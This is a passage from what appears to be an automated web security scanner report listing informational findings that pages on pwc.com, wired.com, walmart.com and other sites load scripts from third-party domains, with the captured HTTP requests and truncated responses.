...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.26. http://www.pwc.com/gx/en/annual-review previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/gx/en/annual-review

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /gx/en/annual-review HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:59 GMT
Content-Length: 17548
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.27. http://www.pwc.com/gx/en/annual-review/facts-figures-2010.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/gx/en/annual-review/facts-figures-2010.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /gx/en/annual-review/facts-figures-2010.jhtml HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:35:00 GMT
Content-Length: 32216
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.28. http://www.pwc.com/gx/en/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/gx/en/index.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /gx/en/index.jhtml HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:59 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gx" lang="en-gx">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.29. http://www.pwc.com/us/en/10minutes/cloud-computing.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/10minutes/cloud-computing.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /us/en/10minutes/cloud-computing.jhtml HTTP/1.1
Host: www.pwc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760111214:ss=1294760084820; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; LD.previous.visitor.us.pwc.com=true;

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:58 GMT
Content-Length: 19995
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.30. http://www.pwc.com/us/en/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/index.jhtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://code.jquery.com/jquery-1.4.2.min.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /us/en/index.jhtml HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=price+waterhouse
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:06 GMT
Connection: close
Content-Length: 39880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

16.31. http://www.pwc.com/us/en/industry/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/industry/index.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /us/en/industry/index.jhtml HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/us/en/services/index.jhtml
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760101352:ss=1294760084820

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:26 GMT
Connection: close
Content-Length: 17769

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.32. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/issues/cloud-computing/index.jhtml

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://code.jquery.com/jquery-1.4.2.min.js
http://poll.websitegear.com/compactpoll.asp?pollID=16814

Request

Response

16.33. http://www.pwc.com/us/en/issues/current-issues.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/issues/current-issues.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /us/en/issues/current-issues.jhtml HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/us/en/index.jhtml
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760084820:ss=1294760084820

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:23 GMT
Connection: close
Content-Length: 22738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.34. http://www.pwc.com/us/en/services/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/services/index.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /us/en/services/index.jhtml HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/us/en/issues/current-issues.jhtml
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760099737:ss=1294760084820

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:25 GMT
Connection: close
Content-Length: 22377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.35. http://www.pwc.com/us/en/technology/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/technology/index.jhtml

Issue detail

The response dynamically includes the following script from another domain:

http://code.jquery.com/jquery-1.4.2.min.js

Request

GET /us/en/technology/index.jhtml HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/us/en/industry/index.jhtml
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760102599:ss=1294760084820

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:31 GMT
Connection: close
Content-Length: 22282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...

16.36. http://www.tukaiz.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tukaiz.com
Path:	/index.php

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /index.php HTTP/1.1
Host: www.tukaiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: PHP/5.2.1
Set-Cookie: fc0fc83ec7006e5c547094008560a464=-; path=/
Date: Wed, 12 Jan 2011 05:01:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.37. http://www.tukui.org/v2/forums/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tukui.org
Path:	/v2/forums/

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /v2/forums/ HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:58:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 26374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<link type="text/css" href="/v2/forums/jquery.jscrollpane.css" rel="stylesheet" media="all" />
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...

16.38. http://www.tukui.org/v2/forums/register.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tukui.org
Path:	/v2/forums/register.php

Issue detail

The response dynamically includes the following script from another domain:

https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /v2/forums/register.php HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.39. http://www.walmart.com/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.walmart.com
Path:	/x22

Issue detail

The response dynamically includes the following scripts from other domains:

http://cts.channelintelligence.com/841291_landing.js
http://i2.walmartimages.com/js/opinionlab/oo_conf_en-US_inline.js
http://i2.walmartimages.com/js/opinionlab/oo_engine_c.js
http://i2.walmartimages.com/js/rollups/catalog.jsp

Request

GET /x22 HTTP/1.1
Host: www.walmart.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.40. http://www.websitedescription.com/msn.whitepages.com previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.websitedescription.com
Path:	/msn.whitepages.com

Issue detail

The response dynamically includes the following script from another domain:

http://arec.us/ads/ad7.js

Request

GET /msn.whitepages.com HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.41. http://www.wired.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://static.reddit.com/wired.js
http://www.google-analytics.com/urchin.js

Request

GET / HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=105
Expires: Wed, 12 Jan 2011 15:37:32 GMT
Date: Wed, 12 Jan 2011 15:35:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 186750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<div id="river_list-elsewhere">
<script language="JavaScript" src="http://static.reddit.com/wired.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

16.42. http://www.wired.com/about/blogs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/blogs

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/blogs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:12:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=458
Expires: Wed, 12 Jan 2011 15:48:01 GMT
Date: Wed, 12 Jan 2011 15:40:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.43. http://www.wired.com/about/faq/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/faq/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/faq/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:08:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:34 GMT
Date: Wed, 12 Jan 2011 15:40:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39307

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.44. http://www.wired.com/about/feedback/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/feedback/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/feedback/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:59:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:48:25 GMT
Date: Wed, 12 Jan 2011 15:40:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.45. http://www.wired.com/about/mobile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/about/mobile/

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /about/mobile/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:28:16 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=457
Expires: Wed, 12 Jan 2011 15:48:06 GMT
Date: Wed, 12 Jan 2011 15:40:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
